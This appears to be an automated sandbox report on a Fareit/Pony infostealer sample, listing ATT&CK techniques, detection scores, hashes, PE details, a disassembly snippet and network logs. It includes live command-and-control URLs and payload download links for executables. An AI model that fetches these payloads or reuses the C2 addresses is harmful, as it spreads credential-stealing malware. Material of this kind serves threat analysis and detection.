Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Account Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Install Root Certificate	Cached Domain Credentials	3 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	14 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
pbfe2Xcxue.exe	96%	ReversingLabs	Win32.Infostealer.Fareit
pbfe2Xcxue.exe	76%	Virustotal		Browse
pbfe2Xcxue.exe	100%	Avira	TR/Urausy.310276641
pbfe2Xcxue.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://https://ftp://operawand.dat_Software	0%	Avira URL Cloud	safe
ftp://http://https://ftp.fireFTPsites.datSeaMonkey	0%	Avira URL Cloud	safe
http://www.ue-electronics.de/XjwiYdic.exe	0%	Avira URL Cloud	safe
http://onecable.ca/forum/viewtopic.php$Z	0%	Avira URL Cloud	safe
http://oliviagurun.com/forum/viewtopic.php	0%	Avira URL Cloud	safe
http://oliviagurun.com/forum/viewtopic.phphttp://onecable.ca/forum/viewtopic.phphttp://onlyidea.com/	0%	Avira URL Cloud	safe
http://onecable.ca/forum/viewtopic.phpH	0%	Avira URL Cloud	safe
http://ftp.pexgol.com/bm6dog.exe	0%	Avira URL Cloud	safe
http://67.158.38.155/jiKEb8.exe	0%	Avira URL Cloud	safe
http://onecable.ca/forum/viewtopic.php	0%	Avira URL Cloud	safe
http://aasthakitchen.com/vMTXwWg.exe	0%	Avira URL Cloud	safe
http://onlyidea.com/forum/viewtopic.php	100%	Avira URL Cloud	phishing
http://originalpizzaplus.ca/forum/viewtopic.php	0%	Avira URL Cloud	safe
https://login.live.co	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
onecable.ca	3.33.130.190	true	true		unknown
oliviagurun.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.ue-electronics.de/XjwiYdic.exe	true	Avira URL Cloud: safe	unknown
http://onecable.ca/forum/viewtopic.php	true	Avira URL Cloud: safe	unknown
http://ftp.pexgol.com/bm6dog.exe	true	Avira URL Cloud: safe	unknown
http://67.158.38.155/jiKEb8.exe	true	Avira URL Cloud: safe	unknown
http://oliviagurun.com/forum/viewtopic.php	true	Avira URL Cloud: safe	unknown
http://aasthakitchen.com/vMTXwWg.exe	true	Avira URL Cloud: safe	unknown
http://onlyidea.com/forum/viewtopic.php	true	Avira URL Cloud: phishing	unknown
http://originalpizzaplus.ca/forum/viewtopic.php	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://https://ftp://operawand.dat_Software	pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://onecable.ca/forum/viewtopic.php$Z	pbfe2Xcxue.exe, 00000000.00000002.2904373998.000000000052C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmp	false		high
ftp://http://https://ftp.fireFTPsites.datSeaMonkey	pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ibsensoftware.com/	pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmp	false		high
http://oliviagurun.com/forum/viewtopic.phphttp://onecable.ca/forum/viewtopic.phphttp://onlyidea.com/	pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://onecable.ca/forum/viewtopic.phpH	pbfe2Xcxue.exe, 00000000.00000002.2904373998.000000000052C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.live.co	pbfe2Xcxue.exe, 00000000.00000003.2023274882.0000000000562000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
3.33.130.190	onecable.ca	United States		8987	AMAZONEXPANSIONGB	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583552
Start date and time:	2025-01-03 03:11:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	pbfe2Xcxue.exe renamed because original name is a hash value
Original Sample Name:	604b748dca0419d94b618beb4c5b4710.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@12/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 95 Number of non-executed functions: 44
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3.33.130.190	RtU8kXPnKr.exe	Get hash	malicious	Quasar	Browse	freegeoip.net/xml/
	file.exe	Get hash	malicious	FormBook	Browse	www.emi.wtf/gd04/?uvC=N20YWnVHT5RQC6WMyDV2V8c+DcGptM14OKih1BJNLsVd899Y1bUoCinKVTGhqICNh0dB&UlPxR=-Z1dwda8VP90AL
	TNT AWB TRACKING DETAILS.exe	Get hash	malicious	FormBook	Browse	www.medicaresbasics.xyz/fm31/
	236236236.elf	Get hash	malicious	Unknown	Browse	lojasdinastia.com.br/
	TNT AWB TRACKING DETAILS.exe	Get hash	malicious	FormBook	Browse	www.medicaresbasics.xyz/fm31/
	profroma invoice.exe	Get hash	malicious	FormBook	Browse	www.iglpg.online/rbqc/
	SC_TR11670000_pdf.exe	Get hash	malicious	FormBook	Browse	www.tdassetmgt.info/d55l/
	goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta	Get hash	malicious	Cobalt Strike, FormBook	Browse	www.deikamalaharris.info/lrgf/
	ORDER-401.exe	Get hash	malicious	FormBook	Browse	www.likesharecomment.net/nqht/
	Nieuwebestellingen10122024.exe	Get hash	malicious	FormBook	Browse	www.cbprecise.online/cvmn/

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZONEXPANSIONGB	https://ntta.org-pay-u5ch.sbs/us/	Get hash	malicious	Unknown	Browse	3.33.220.150
	Sylacauga AL License.msg	Get hash	malicious	Unknown	Browse	3.32.86.144
	RtU8kXPnKr.exe	Get hash	malicious	Quasar	Browse	3.33.130.190
	http://ghostbin.cafe24.com/	Get hash	malicious	Unknown	Browse	52.223.40.198
	Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe	Get hash	malicious	DBatLoader, FormBook	Browse	52.223.13.41
	T1#U52a9#U624b1.0.1.exe	Get hash	malicious	Unknown	Browse	52.223.40.198
	telnet.sh4.elf	Get hash	malicious	Unknown	Browse	52.223.138.114
	armv7l.elf	Get hash	malicious	Unknown	Browse	96.127.3.82
	jklspc.elf	Get hash	malicious	Unknown	Browse	3.47.75.42
	nabarm.elf	Get hash	malicious	Unknown	Browse	3.37.62.206

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.630663584435947
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	pbfe2Xcxue.exe
File size:	126'464 bytes
MD5:	604b748dca0419d94b618beb4c5b4710
SHA1:	afec5dc4982d4ea85722448d2e8155274902c141
SHA256:	b613f1a4fe5e99b6c4d32e72bef59d1e270a337b5b5d4e775cfb58a18b38c66e
SHA512:	a1b5b4c44dd61bac6eeb5c7a4badf06d73d8cf7d47ce652b5632ca5c0c76932aec19244fd847fdf4fba67b6dd73b9d2feeb95b9511c104a431805ac609fbd730
SSDEEP:	3072:I9Jnbm6LkxaPAkseoTgnA4rY9Wv5arpT:eL54kseoUn5Y9M5a1T
TLSH:	2DC3D0D0D6D11473D7B4183B3EF2AC37E73696BA1CB4075921C4D24AAAAB643613BC87
File Content Preview:	MZ......................@...............................................!..L.!..That program must be run under Win32..$7........PE..L.....DD................. ...........'.......0....@.......................................@................................

File Icon


Icon Hash:	185888c999ad878b

Static PE Info

General

Entrypoint:	0x4027fa
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x4444AEFD [Tue Apr 18 09:18:53 2006 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	a93e84a8e774b03b9e034323a5c06d79

Entrypoint Preview

Instruction
lea eax, dword ptr [esp]
sub ax, 0000F000h
jc 00007F2B7C7E878Eh
mov eax, 00403068h
mov ecx, eax
mov edx, eax
mov esi, dword ptr [edx]
sub edi, edi
mov eax, 00403328h
push eax
sub dword ptr [esp], 40h
call dword ptr [00403008h]
sub esi, eax
xchg eax, edi
push 00000100h
pop ecx
bswap ecx
sub esi, ecx
jc 00007F2B7C7E8763h
push edi
pop ecx
add ecx, dword ptr [ecx+3Ch]
mov ebx, 00000040h
pushad
sub ecx, FFFFFF7Ch
lea esi, dword ptr [004032E8h]
cmp ebx, dword ptr [ecx]
jnc 00007F2B7C7E8747h
push 00000002h
pop ecx
loop 00007F2B7C7E86E6h
popad
ret
adc ecx, esi
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3074	0xa0	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x1bea5	.RData
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2853	0x1c
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1853	0x1a00	d7556d18ec1eafbd1a8304c6ccd1dc6b	False	0.24699519230769232	data	4.836524364195282	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x3000	0x6e8	0x800	c96afe7f386625fb23e7c0efbf7c7833	False	0.2080078125	data	2.251686995208463	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_LNK_NRELOC_OVFL, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.RData	0x4000	0x1bea5	0x1c000	9936674d5a9382e048705f487b2c3ed3	False	0.9247959681919643	data	7.827027769632456	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_LNK_NRELOC_OVFL, IMAGE_SCN_MEM_READ
.Adata	0x20000	0x722	0x800	c99a74c555371a433d121f551d6c6398	False	0.01123046875	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x1becd	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	0.5204356846473029
RT_ICON	0x1e475	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.649155722326454
RT_ICON	0x1f51d	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	0.7135245901639344
RT_RCDATA	0x4521	0x1797c	data	0.9897450225588807
RT_GROUP_ICON	0x1be9d	0x30	data	0.8541666666666666
RT_MANIFEST	0x4190	0x391	XML 1.0 document, ASCII text, with CRLF line terminators	0.4414019715224535

Imports

DLL	Import
KERNEL32.dll	SetCurrentDirectoryA, SetLastError, GetModuleHandleA, lstrcpyW, GetProcessHeap, GetModuleFileNameA, IsValidLocale, lstrcpyW, VirtualAllocEx, lstrcpyW, GetStdHandle, lstrcpyW, FindNextVolumeA, lstrlenW, GetLocaleInfoA, FindFirstVolumeA, CreateEventA, DeleteFileA, SetConsoleTitleA, GetStartupInfoW, GetVolumePathNameW, IsBadStringPtrA, lstrcpyW
UNTFS.dll	Format, ChkdskEx, Extend, Recover

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-03T03:12:50.647005+0100	2014411	ET MALWARE Fareit/Pony Downloader Checkin 2	1	192.168.2.4	49736	3.33.130.190	80	TCP
2025-01-03T03:12:56.151035+0100	2014411	ET MALWARE Fareit/Pony Downloader Checkin 2	1	192.168.2.4	49754	3.33.130.190	80	TCP
2025-01-03T03:13:01.668659+0100	2014411	ET MALWARE Fareit/Pony Downloader Checkin 2	1	192.168.2.4	49788	3.33.130.190	80	TCP
2025-01-03T03:13:10.087497+0100	2014411	ET MALWARE Fareit/Pony Downloader Checkin 2	1	192.168.2.4	49842	3.33.130.190	80	TCP
2025-01-03T03:13:16.509557+0100	2014411	ET MALWARE Fareit/Pony Downloader Checkin 2	1	192.168.2.4	49885	3.33.130.190	80	TCP
2025-01-03T03:13:22.010132+0100	2014411	ET MALWARE Fareit/Pony Downloader Checkin 2	1	192.168.2.4	49923	3.33.130.190	80	TCP
2025-01-03T03:13:30.447507+0100	2014411	ET MALWARE Fareit/Pony Downloader Checkin 2	1	192.168.2.4	49973	3.33.130.190	80	TCP
2025-01-03T03:13:35.917877+0100	2014411	ET MALWARE Fareit/Pony Downloader Checkin 2	1	192.168.2.4	50009	3.33.130.190	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 03:12:50.634217024 CET	49736	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:12:50.640356064 CET	80	49736	3.33.130.190	192.168.2.4
Jan 3, 2025 03:12:50.640422106 CET	49736	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:12:50.641019106 CET	49736	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:12:50.646931887 CET	80	49736	3.33.130.190	192.168.2.4
Jan 3, 2025 03:12:50.647005081 CET	49736	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:12:50.651873112 CET	80	49736	3.33.130.190	192.168.2.4
Jan 3, 2025 03:12:51.126099110 CET	80	49736	3.33.130.190	192.168.2.4
Jan 3, 2025 03:12:51.126291990 CET	80	49736	3.33.130.190	192.168.2.4
Jan 3, 2025 03:12:51.126348019 CET	49736	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:12:51.128118992 CET	49736	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:12:51.132925987 CET	80	49736	3.33.130.190	192.168.2.4
Jan 3, 2025 03:12:56.140645981 CET	49754	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:12:56.145589113 CET	80	49754	3.33.130.190	192.168.2.4
Jan 3, 2025 03:12:56.145658970 CET	49754	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:12:56.146125078 CET	49754	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:12:56.150945902 CET	80	49754	3.33.130.190	192.168.2.4
Jan 3, 2025 03:12:56.151035070 CET	49754	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:12:56.155802011 CET	80	49754	3.33.130.190	192.168.2.4
Jan 3, 2025 03:12:56.628221989 CET	80	49754	3.33.130.190	192.168.2.4
Jan 3, 2025 03:12:56.634727955 CET	80	49754	3.33.130.190	192.168.2.4
Jan 3, 2025 03:12:56.636090994 CET	49754	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:12:56.636178017 CET	49754	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:12:56.640974998 CET	80	49754	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:01.658592939 CET	49788	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:01.663499117 CET	80	49788	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:01.663567066 CET	49788	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:01.663772106 CET	49788	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:01.668602943 CET	80	49788	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:01.668658972 CET	49788	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:01.673489094 CET	80	49788	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:05.065531969 CET	80	49788	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:05.065762997 CET	80	49788	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:05.065907001 CET	49788	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:05.066648006 CET	49788	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:05.071444988 CET	80	49788	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:10.077754021 CET	49842	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:10.082577944 CET	80	49842	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:10.082645893 CET	49842	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:10.082688093 CET	49842	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:10.087447882 CET	80	49842	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:10.087496996 CET	49842	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:10.092298985 CET	80	49842	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:11.483465910 CET	80	49842	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:11.483606100 CET	80	49842	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:11.483652115 CET	49842	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:11.484787941 CET	49842	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:11.489553928 CET	80	49842	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:16.499670029 CET	49885	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:16.504565001 CET	80	49885	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:16.504657030 CET	49885	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:16.504730940 CET	49885	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:16.509509087 CET	80	49885	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:16.509557009 CET	49885	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:16.514388084 CET	80	49885	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:16.987520933 CET	80	49885	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:16.987648964 CET	80	49885	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:16.987694025 CET	49885	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:16.989178896 CET	49885	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:16.994035006 CET	80	49885	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:21.999797106 CET	49923	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:22.004960060 CET	80	49923	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:22.005039930 CET	49923	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:22.005090952 CET	49923	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:22.009957075 CET	80	49923	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:22.010132074 CET	49923	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:22.014903069 CET	80	49923	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:25.425403118 CET	80	49923	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:25.425523043 CET	80	49923	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:25.425575018 CET	49923	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:25.427186966 CET	49923	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:25.431922913 CET	80	49923	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:30.437077999 CET	49973	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:30.441971064 CET	80	49973	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:30.442039013 CET	49973	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:30.442671061 CET	49973	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:30.447452068 CET	80	49973	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:30.447506905 CET	49973	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:30.452318907 CET	80	49973	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:30.896998882 CET	80	49973	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:30.897197008 CET	80	49973	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:30.897463083 CET	49973	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:30.898119926 CET	49973	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:30.902857065 CET	80	49973	3.33.130.190	192.168.2.4
Jan 3, 2025 03:13:35.905947924 CET	50009	80	192.168.2.4	3.33.130.190
Jan 3, 2025 03:13:35.911638021 CET	80	50009	3.33.130.190	192.168.2.4
